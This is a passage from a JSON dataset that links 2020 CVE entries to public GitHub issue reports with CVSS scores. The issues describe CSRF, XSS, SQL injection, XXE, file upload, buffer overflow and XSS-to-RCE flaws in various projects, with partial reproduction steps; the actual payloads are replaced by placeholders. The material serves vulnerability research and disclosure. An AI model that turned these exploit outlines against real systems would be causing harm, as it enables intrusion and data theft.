  49967. "description": "Bug: APITAG NUMBERTAG CSRF NUMBERTAG Hi, I would like to report CSRF vulnerability in APITAG NUMBERTAG There is a CSRF vulnerability that can be added to modify administrator accounts. POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG URLTAG eg: APITAG modification FILETAG NUMBERTAG CSRF POC FILETAG FILETAG APITAG modification FILETAG fix: Sensitive operations require validation codes, and changing passwords requires validation of old passwords.",
  49968. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49969. "severity": "HIGH",
  49970. "baseScore": 8.8,
  49971. "impactScore": 5.9,
  49972. "exploitabilityScore": 2.8
  49973. },
  49974. {
  49975. "CVE_ID": "CVE-2020-18657",
  49976. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310",
  49977. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1310",
  49978. "Repo_new": "getsimplecms/getsimplecms",
  49979. "Issue_Created_At": "2019-05-05T09:11:28Z",
  49980. "description": "Some security vulnerabilities in NUMBERTAG Some security vulnerabilities in NUMBERTAG any url redirection in function redirect Limited Reflective xss in function redirect Reflective xss in FILETAG Reflective xss in FILETAG the details of these vulnerabilities to see FILETAG",
  49981. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49982. "severity": "MEDIUM",
  49983. "baseScore": 6.1,
  49984. "impactScore": 2.7,
  49985. "exploitabilityScore": 2.8
  49986. },
  49987. {
  49988. "CVE_ID": "CVE-2020-18661",
  49989. "Issue_Url_old": "https://github.com/gnuboard/gnuboard5/issues/43",
  49990. "Issue_Url_new": "https://github.com/gnuboard/gnuboard5/issues/43",
  49991. "Repo_new": "gnuboard/gnuboard5",
  49992. "Issue_Created_At": "2019-04-29T09:24:29Z",
  49993. "description": "Some security vulnerabilities in NUMBERTAG Some security vulnerabilities in NUMBERTAG limited Reflective xss in FILETAG Reflective xss in FILETAG SQL injection in FILETAG the details of these vulnerabilities to see FILETAG",
  49994. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49995. "severity": "MEDIUM",
  49996. "baseScore": 6.1,
  49997. "impactScore": 2.7,
  49998. "exploitabilityScore": 2.8
  49999. },
  50000. {
  50001. "CVE_ID": "CVE-2020-18670",
  50002. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/7406",
  50003. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/7406",
  50004. "Repo_new": "roundcube/roundcubemail",
  50005. "Issue_Created_At": "2020-05-29T04:29:34Z",
  50006. "description": "security issue. I found some security issues in roundcobe NUMBERTAG I'm sorry I didn't find a way to submit a security issue, should I submit it directly via github issue?",
  50007. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50008. "severity": "MEDIUM",
  50009. "baseScore": 5.4,
  50010. "impactScore": 2.7,
  50011. "exploitabilityScore": 2.3
  50012. },
  50013. {
  50014. "CVE_ID": "CVE-2020-18693",
  50015. "Issue_Url_old": "https://github.com/MineWeb/MineWebCMS/issues/123",
  50016. "Issue_Url_new": "https://github.com/mineweb/minewebcms/issues/123",
  50017. "Repo_new": "mineweb/minewebcms",
  50018. "Issue_Created_At": "2019-03-18T08:41:34Z",
  50019. "description": "APITAG in APITAG Affected APITAG Type of vulnerability: XSS APITAG Discovered by: Ryan0lb details: Open this url \u201c URLTAG \u201c and login in FILETAG and Click the APITAG and view the News we can add a new article FILETAG We can control this parameter via \"title\",and we can insert the APITAG APITAG \" in title FILETAG finally,submit! The malicious javascript payload executed for it successlly FILETAG and open the article's url:\" URLTAG APITAG malicious javascript payload executed for it successlly too FILETAG Without any filtering on publish the article, we can easily trigger malicious XSS Payload and attack every visitor maliciously.",
  50020. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50021. "severity": "MEDIUM",
  50022. "baseScore": 5.4,
  50023. "impactScore": 2.7,
  50024. "exploitabilityScore": 2.3
  50025. },
  50026. {
  50027. "CVE_ID": "CVE-2020-18694",
  50028. "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/5",
  50029. "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/5",
  50030. "Repo_new": "ignitedcms/ignitedcms",
  50031. "Issue_Created_At": "2019-03-28T09:20:36Z",
  50032. "description": "There is one CSRF vulnerabilities that can change the user's password(include admin). There is one CSRF vulnerabilities that can change the user's password(include admin) Poc: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  50033. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50034. "severity": "HIGH",
  50035. "baseScore": 8.8,
  50036. "impactScore": 5.9,
  50037. "exploitabilityScore": 2.8
  50038. },
  50039. {
  50040. "CVE_ID": "CVE-2020-18698",
  50041. "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/27",
  50042. "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/27",
  50043. "Repo_new": "talelin/lin-cms-flask",
  50044. "Issue_Created_At": "2019-03-14T13:54:47Z",
  50045. "description": "Login brute force Vulnerability in Latest Release. Hi, I would like to report login brute force vulnerability in latest release. Description: Login brute force vulnerability in PATHTAG NUMBERTAG line APITAG function. No need to limit the number of logins and set the verification code will cause the username and password to be brute force, like this: FILETAG author by jin. EMAILTAG .cn",
  50046. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50047. "severity": "CRITICAL",
  50048. "baseScore": 9.8,
  50049. "impactScore": 5.9,
  50050. "exploitabilityScore": 3.9
  50051. },
  50052. {
  50053. "CVE_ID": "CVE-2020-18699",
  50054. "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/28",
  50055. "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/28",
  50056. "Repo_new": "talelin/lin-cms-flask",
  50057. "Issue_Created_At": "2019-03-14T14:10:04Z",
  50058. "description": "Cross Site Scripting Vulnerability in Latest Release . Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in PATHTAG NUMBERTAG line APITAG function and PATHTAG NUMBERTAG line APITAG function. User name usage XSS payload will be executed in the log when registering users Steps To Reproduce: APITAG a user, the username is xss payload. FILETAG APITAG use the username login, see the log manager find the xss payload already executed, the super user also can find. FILETAG author by jin. EMAILTAG .cn",
  50059. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50060. "severity": "MEDIUM",
  50061. "baseScore": 6.1,
  50062. "impactScore": 2.7,
  50063. "exploitabilityScore": 2.8
  50064. },
  50065. {
  50066. "CVE_ID": "CVE-2020-18701",
  50067. "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/30",
  50068. "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/30",
  50069. "Repo_new": "talelin/lin-cms-flask",
  50070. "Issue_Created_At": "2019-03-14T14:24:59Z",
  50071. "description": "Identity authentication vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Identity authentication vulnerability in the logout, When you log out, the authentication token is still valid. Steps To Reproduce: APITAG the background NUMBERTAG Do something, like list users APITAG APITAG packet, can see the user list. FILETAG author by jin. EMAILTAG .cn",
  50072. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50073. "severity": "CRITICAL",
  50074. "baseScore": 9.8,
  50075. "impactScore": 5.9,
  50076. "exploitabilityScore": 3.9
  50077. },
  50078. {
  50079. "CVE_ID": "CVE-2020-18702",
  50080. "Issue_Url_old": "https://github.com/rochacbruno/quokka/issues/675",
  50081. "Issue_Url_new": "https://github.com/quokkaproject/quokka/issues/675",
  50082. "Repo_new": "quokkaproject/quokka",
  50083. "Issue_Created_At": "2019-03-21T08:21:29Z",
  50084. "description": "Cross Site Scripting Vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability PATHTAG NUMBERTAG line, Because there is no filter username. The vulnerability code is: CODETAG Steps To Reproduce: APITAG a user, username is xss payload, like: APITAG alert NUMBERTAG APITAG APITAG the username and Create user profile block, then trigger the payload. FILETAG FILETAG author by jin. EMAILTAG .cn",
  50085. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50086. "severity": "MEDIUM",
  50087. "baseScore": 6.1,
  50088. "impactScore": 2.7,
  50089. "exploitabilityScore": 2.8
  50090. },
  50091. {
  50092. "CVE_ID": "CVE-2020-18703",
  50093. "Issue_Url_old": "https://github.com/rochacbruno/quokka/issues/676",
  50094. "Issue_Url_new": "https://github.com/quokkaproject/quokka/issues/676",
  50095. "Repo_new": "quokkaproject/quokka",
  50096. "Issue_Created_At": "2019-03-21T08:49:11Z",
  50097. "description": "XML External Entity (XXE) Vulnerability in Latest Release. Hi, I would like to report XML External Entity (XXE) vulnerability in latest release. Description: XML External Entity (XXE) vulnerability in PATHTAG NUMBERTAG line and PATHTAG NUMBERTAG line, Because there is no filter authors, title. Steps To Reproduce: APITAG a article, title and authors can insert XML payload. APITAG the url: URLTAG {author}/index.rss URLTAG APITAG can see the title and authors has inserted into the XML. FILETAG FILETAG FILETAG author by jin. EMAILTAG .cn",
  50098. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50099. "severity": "CRITICAL",
  50100. "baseScore": 9.8,
  50101. "impactScore": 5.9,
  50102. "exploitabilityScore": 3.9
  50103. },
  50104. {
  50105. "CVE_ID": "CVE-2020-18704",
  50106. "Issue_Url_old": "https://github.com/fusionbox/django-widgy/issues/387",
  50107. "Issue_Url_new": "https://github.com/fusionbox/django-widgy/issues/387",
  50108. "Repo_new": "fusionbox/django-widgy",
  50109. "Issue_Created_At": "2019-07-09T08:11:03Z",
  50110. "description": "Unrestricted File Upload Vulnerability in demo site. Hi, I would like to report unrestricted file upload vulnerability in demo site. Description: Unrestricted File Upload Vulnerability in demo site image widget. Steps To Reproduce NUMBERTAG First in the page builder create a image widget and edit it. FILETAG NUMBERTAG Then upload file, you can upload any file you want. FILETAG NUMBERTAG Find you upload file URL FILETAG NUMBERTAG Open the URL you can see the page execution FILETAG author by jin. EMAILTAG .cn",
  50111. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50112. "severity": "CRITICAL",
  50113. "baseScore": 9.8,
  50114. "impactScore": 5.9,
  50115. "exploitabilityScore": 3.9
  50116. },
  50117. {
  50118. "CVE_ID": "CVE-2020-18730",
  50119. "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/4",
  50120. "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/4",
  50121. "Repo_new": "airpig2011/iec104",
  50122. "Issue_Created_At": "2019-03-17T14:51:32Z",
  50123. "description": "SEGV in function APITAG Hello. I built protocol IEC NUMBERTAG in my ubuntu NUMBERTAG machine with APITAG APITAG before make) . And I use prenny desock URLTAG tool to build channels socket communication to the console. But when I use the following as the input to the server socket APITAG , there will be a SEGV during the running. APITAG The run time error information is: ERRORTAG I use gdb to debug it and the information is as following: CODETAG",
  50124. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50125. "severity": "HIGH",
  50126. "baseScore": 7.5,
  50127. "impactScore": 3.6,
  50128. "exploitabilityScore": 3.9
  50129. },
  50130. {
  50131. "CVE_ID": "CVE-2020-18731",
  50132. "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/5",
  50133. "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/5",
  50134. "Repo_new": "airpig2011/iec104",
  50135. "Issue_Created_At": "2019-03-18T02:47:00Z",
  50136. "description": "SEGV in function APITAG Hello. I built protocol IEC NUMBERTAG in my ubuntu NUMBERTAG machine with APITAG APITAG before make) . And I use [prenny desock NUMBERTAG tool to build channels socket communication to the console. But when I use the following as the input to the server socket NUMBERTAG there will be a SEGV during the running. APITAG The command line is as follows: PATHTAG ./iec NUMBERTAG monitor m server n NUMBERTAG test_input where APITAG is the lib of asan, APITAG is the lib of preeny desock APITAG is the binaray file which contains the test input The run time error information is: ERRORTAG I use gdb to debug it and the information is as following: CODETAG NUMBERTAG URLTAG",
  50137. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50138. "severity": "HIGH",
  50139. "baseScore": 7.5,
  50140. "impactScore": 3.6,
  50141. "exploitabilityScore": 3.9
  50142. },
  50143. {
  50144. "CVE_ID": "CVE-2020-18734",
  50145. "Issue_Url_old": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/476",
  50146. "Issue_Url_new": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/476",
  50147. "Repo_new": "eclipse-cyclonedds/cyclonedds",
  50148. "Issue_Created_At": "2020-04-07T15:49:06Z",
  50149. "description": "Stack buffer overflow was found at PATHTAG in nn_bitset_one.. I used Peach Fuzzer to fuzz the APITAG at PATHTAG After a period of time, A stack buffer overflow crash was found by APITAG Next is the full crash information. ERRORTAG I guess it is a potential vulnerability in cyclone project. Please detect whether it is a problem. Thanks!",
  50150. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50151. "severity": "HIGH",
  50152. "baseScore": 7.5,
  50153. "impactScore": 3.6,
  50154. "exploitabilityScore": 3.9
  50155. },
  50156. {
  50157. "CVE_ID": "CVE-2020-18735",
  50158. "Issue_Url_old": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/501",
  50159. "Issue_Url_new": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/501",
  50160. "Repo_new": "eclipse-cyclonedds/cyclonedds",
  50161. "Issue_Created_At": "2020-04-21T12:54:33Z",
  50162. "description": "Heap buffer overflow was found at PATHTAG I used Peach Fuzzer to fuzz the APITAG at PATHTAG After a period of time, A heap buffer overflow crash was found by APITAG Next is the full crash information. ERRORTAG And this problem was found in version NUMBERTAG I guess the problem was in function APITAG I did the similar fuzz operation on version NUMBERTAG too, but the new version does not have this vulnerability. But I found some similar code around the vulnerability position in the new version. I am not sure why NUMBERTAG has the vulnerability and NUMBERTAG doe not have it.",
  50163. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50164. "severity": "HIGH",
  50165. "baseScore": 7.5,
  50166. "impactScore": 3.6,
  50167. "exploitabilityScore": 3.9
  50168. },
  50169. {
  50170. "CVE_ID": "CVE-2020-18737",
  50171. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2289",
  50172. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2289",
  50173. "Repo_new": "typora/typora-issues",
  50174. "Issue_Created_At": "2019-03-17T10:04:54Z",
  50175. "description": "APITAG XSS to RCE. Tested On Windows NUMBERTAG ersion NUMBERTAG FILETAG XSS NUMBERTAG mermaid graph LR id1 FILETAG RCE NUMBERTAG mermaid graph LR id1 FILETAG FILETAG",
  50176. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50177. "severity": "MEDIUM",
  50178. "baseScore": 6.1,
  50179. "impactScore": 2.7,
  50180. "exploitabilityScore": 2.8
  50181. },
  50182. {
  50183. "CVE_ID": "CVE-2020-18741",
  50184. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/19",
  50185. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/19",
  50186. "Repo_new": "thinksaas/thinksaas",
  50187. "Issue_Created_At": "2019-03-18T12:48:35Z",
  50188. "description": "Thinksns Overrides the Right to Modify the Photo Description of Albums thinksns\u8d8a\u6743\u4fee\u6539\u76f8\u518c\u56fe\u7247\u63cf\u8ff0. Thinksns Overrides the Right to Modify the Photo Description of Albums POST Packet: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: Your landing cookie APITAG Get parameters: Log in to demo on the official website, select an album: URLTAG enter an album: URLTAG click on an image: URLTAG photoid NUMBERTAG B NUMBERTAG D parameter is show parameter, and then replay the data package to change the description of other people's picture to photodesc NUMBERTAG B NUMBERTAG D parameter. PATHTAG thinksns\u8d8a\u6743\u4fee\u6539\u76f8\u518c\u56fe\u7247\u63cf\u8ff0 POST\u6570\u636e\u5305\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: \u4f60\u7684\u767b\u9646cookie APITAG \u83b7\u53d6\u53c2\u6570\uff1a\u5728\u5b98\u7f51demo\u767b\u9646\uff0c\u9009\u62e9\u4e00\u4e2a\u76f8\u518c\uff1a URLTAG \uff0c\u8fdb\u5165\u4e00\u4e2a\u76f8\u518c\uff1a URLTAG \uff0c\u5728\u70b9\u51fb\u4e00\u4e2a\u56fe\u7247\uff1a URLTAG APITAG",
  50189. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  50190. "severity": "MEDIUM",
  50191. "baseScore": 5.3,
  50192. "impactScore": 1.4,
  50193. "exploitabilityScore": 3.9
  50194. },
  50195. {
  50196. "CVE_ID": "CVE-2020-18746",
  50197. "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/3",
  50198. "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/3",
  50199. "Repo_new": "kk98kk0/exploit",
  50200. "Issue_Created_At": "2019-03-20T06:07:35Z",
  50201. "description": "APITAG system background sql injection vulnerability. Vulnerability description Test object NUMBERTAG website name: APITAG NUMBERTAG web: FILETAG NUMBERTAG the download link address: URLTAG NUMBERTAG ersion: aitecms NUMBERTAG rar compression package decompression Test time: March NUMBERTAG Description of vulnerability: APITAG system background SQL injection vulnerability. Background management center online message remarks, SQL injection vulnerability > Parameter: MULTIPART id ((custom) POST) > Type: AND/OR time based blind > Title: APITAG NUMBERTAG AND time based blind POC and verification Local setup environment: Install APITAG guide: FILETAG NUMBERTAG Download URLTAG NUMBERTAG the background to URLTAG the password is admin/admin NUMBERTAG erify by the following POC verification methods. Bug: APITAG Verification method: APITAG APITAG ERRORTAG Vulnerability to prove: FILETAG FILETAG Reinforcement proposal\uff1a Improve the filter function Code review\uff1a Local building environment. PATHTAG APITAG Filter function line NUMBERTAG to submit content, imperfect. FILETAG Call APITAG to check $_REQUEST FILETAG Bypass APITAG checks, bypass addslashes function checks FILETAG Connect to a Database PATHTAG FILETAG PATHTAG FILETAG Bypass SQL security checks FILETAG Finally, the editor submitted successfully FILETAG",
  50202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50203. "severity": "HIGH",
  50204. "baseScore": 7.2,
  50205. "impactScore": 5.9,
  50206. "exploitabilityScore": 1.2
  50207. },
  50208. {
  50209. "CVE_ID": "CVE-2020-18748",
  50210. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2226",
  50211. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2226",
  50212. "Repo_new": "typora/typora-issues",
  50213. "Issue_Created_At": "2019-02-26T15:20:01Z",
  50214. "description": "NUMBERTAG SS to RCE. Windows NUMBERTAG APITAG payload CODETAG PS. \u9700\u8981\u4f60\u70b9\u4e00\u4e0b FILETAG",
  50215. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50216. "severity": "MEDIUM",
  50217. "baseScore": 6.1,
  50218. "impactScore": 2.7,
  50219. "exploitabilityScore": 2.8
  50220. },
  50221. {
  50222. "CVE_ID": "CVE-2020-18750",
  50223. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/22",
  50224. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/22",
  50225. "Repo_new": "flexpaper/pdf2json",
  50226. "Issue_Created_At": "2019-03-20T02:55:13Z",
  50227. "description": "HEAP OVERFLOW VULNERABILITY. In APITAG !pst APITAG sizeof(tok3), &n3) || //sizeof(tok NUMBERTAG here n3 can be a value from NUMBERTAG to NUMBERTAG In APITAG APITAG tok NUMBERTAG n NUMBERTAG i); In APITAG if (n APITAG = APITAG { APITAG = APITAG NUMBERTAG APITAG = APITAG ) APITAG APITAG APITAG } map[code NUMBERTAG APITAG = code; APITAG = n NUMBERTAG The parameter n of void APITAG code, char APITAG int n, int offset) can be a bigger value than the the limited value APITAG In APITAG APITAG NUMBERTAG offset; Using the sample pdf file , we can find the VUL clearly. APITAG NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG f0 pwndbg> p APITAG NUMBERTAG c NUMBERTAG u NUMBERTAG len NUMBERTAG pwndbg> p APITAG NUMBERTAG so APITAG NUMBERTAG which makes the array Unicode APITAG as follows oob write. define APITAG NUMBERTAG struct APITAG { APITAG c; Unicode APITAG int len; }; So, we can modify memory from offset NUMBERTAG to NUMBERTAG with type unsigned int by adding the original value with offset, which can still be controlled. Local command execution is possible using heap fengshui, especially in the linux machine using glibc version NUMBERTAG Free a chunk using the bigger fake size can lead to continuously heap buf overflow, which can make the hacker get a memory containing the function pointer and then achieve the purpose of command execution.",
  50228. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50229. "severity": "HIGH",
  50230. "baseScore": 7.8,
  50231. "impactScore": 5.9,
  50232. "exploitabilityScore": 1.8
  50233. },
  50234. {
  50235. "CVE_ID": "CVE-2020-18766",
  50236. "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/147",
  50237. "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/147",
  50238. "Repo_new": "antswordproject/antsword",
  50239. "Issue_Created_At": "2019-04-11T17:33:14Z",
  50240. "description": "There is RCE Vulnerability in APITAG \u60f3\u4ea4\u67d0VE\uff0c\u6240\u4ee5\u4e0b\u9762\u5c31\u7528\u82f1\u6587\u5148\u5199\u4e86 When i connect to my webshell by antsword.If the connection fails, APITAG will echo error information. like this FILETAG this information don't have xss protect,so i can xss and execute system command My poc ERRORTAG FILETAG My exp (for perl) ERRORTAG base NUMBERTAG decode code ERRORTAG getshell FILETAG PATHTAG NUMBERTAG ERRORTAG add xss protect",
  50241. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  50242. "severity": "CRITICAL",
  50243. "baseScore": 9.6,
  50244. "impactScore": 6.0,
  50245. "exploitabilityScore": 2.8
  50246. },
  50247. {
  50248. "CVE_ID": "CVE-2020-18771",
  50249. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/756",
  50250. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/756",
  50251. "Repo_new": "exiv2/exiv2",
  50252. "Issue_Created_At": "2019-03-25T03:52:31Z",
  50253. "description": "one global buffer overread in APITAG in APITAG POC: FILETAG There exists one global buffer overread in APITAG in nikonmn_int.cpp in exi NUMBERTAG which could result in information leak. exi NUMBERTAG pt $poc NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG b NUMBERTAG d NUMBERTAG at pc NUMBERTAG b6efa9f3 bp NUMBERTAG bfc NUMBERTAG sp NUMBERTAG bfc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG d NUMBERTAG thread T NUMBERTAG b6efa9f2 in APITAG APITAG const&, APITAG const ) PATHTAG NUMBERTAG b NUMBERTAG efc in APITAG APITAG const ) const PATHTAG NUMBERTAG b NUMBERTAG d6c1c in APITAG const ) const PATHTAG NUMBERTAG ef in APITAG const&, APITAG const ) PATHTAG NUMBERTAG d2d in APITAG const ) PATHTAG NUMBERTAG fabf1 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG const&) PATHTAG NUMBERTAG d3aa5 in main PATHTAG NUMBERTAG b NUMBERTAG aaf2 ( PATHTAG NUMBERTAG d1af4 in _start ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG is located NUMBERTAG bytes to the left of global variable APITAG from PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG of size NUMBERTAG b NUMBERTAG d NUMBERTAG is located NUMBERTAG bytes to the right of global variable APITAG from PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG APITAG APITAG const&, APITAG const ) Shadow bytes around the buggy address NUMBERTAG ed NUMBERTAG f9 f9 f NUMBERTAG ed NUMBERTAG f9 f9 f9 f NUMBERTAG ed NUMBERTAG ed NUMBERTAG ed NUMBERTAG f9 f9 f NUMBERTAG ed NUMBERTAG a0: f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG e NUMBERTAG ed NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 APITAG internal: fe NUMBERTAG ABORTING",
  50254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  50255. "severity": "HIGH",
  50256. "baseScore": 8.1,
  50257. "impactScore": 5.2,
  50258. "exploitabilityScore": 2.8
  50259. },
  50260. {
  50261. "CVE_ID": "CVE-2020-18773",
  50262. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/760",
  50263. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/760",
  50264. "Repo_new": "exiv2/exiv2",
  50265. "Issue_Created_At": "2019-03-26T01:30:40Z",
  50266. "description": "one invalid memory access in decode function in APITAG POC: FILETAG gdb args ./exi NUMBERTAG pt ~/segment_poc Program received signal SIGSEGV, Segmentation fault NUMBERTAG b7c NUMBERTAG d6 in APITAG APITAG APITAG out>, size=<optimized out>) at PATHTAG NUMBERTAG if ( APITAG != marker_) continue; (gdb) bt NUMBERTAG b7c NUMBERTAG d6 in APITAG APITAG APITAG out>, size=<optimized out>) at PATHTAG NUMBERTAG b7e NUMBERTAG in APITAG (this=<optimized out>, object NUMBERTAG at PATHTAG NUMBERTAG b7e NUMBERTAG in APITAG (this=<optimized out>, object=<optimized out>) at PATHTAG NUMBERTAG APITAG (this=<optimized out>, object=<optimized out>) at PATHTAG NUMBERTAG b7e NUMBERTAG e2a in APITAG (this NUMBERTAG cbf NUMBERTAG isitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG a in operator (this=<optimized out>, visitor=..., this=<optimized out>) at PATHTAG NUMBERTAG APITAG (this=<optimized out>, visitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG dae in APITAG (this NUMBERTAG cbd NUMBERTAG isitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG APITAG APITAG out>, size=<optimized out>, root=<optimized out>, APITAG out>, APITAG out>) at PATHTAG NUMBERTAG b7cf NUMBERTAG be in APITAG (this=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG PATHTAG ) at PATHTAG NUMBERTAG dd9b in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
  50267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50268. "severity": "MEDIUM",
  50269. "baseScore": 6.5,
  50270. "impactScore": 3.6,
  50271. "exploitabilityScore": 2.8
  50272. },
  50273. {
  50274. "CVE_ID": "CVE-2020-18774",
  50275. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/759",
  50276. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/759",
  50277. "Repo_new": "exiv2/exiv2",
  50278. "Issue_Created_At": "2019-03-26T01:26:12Z",
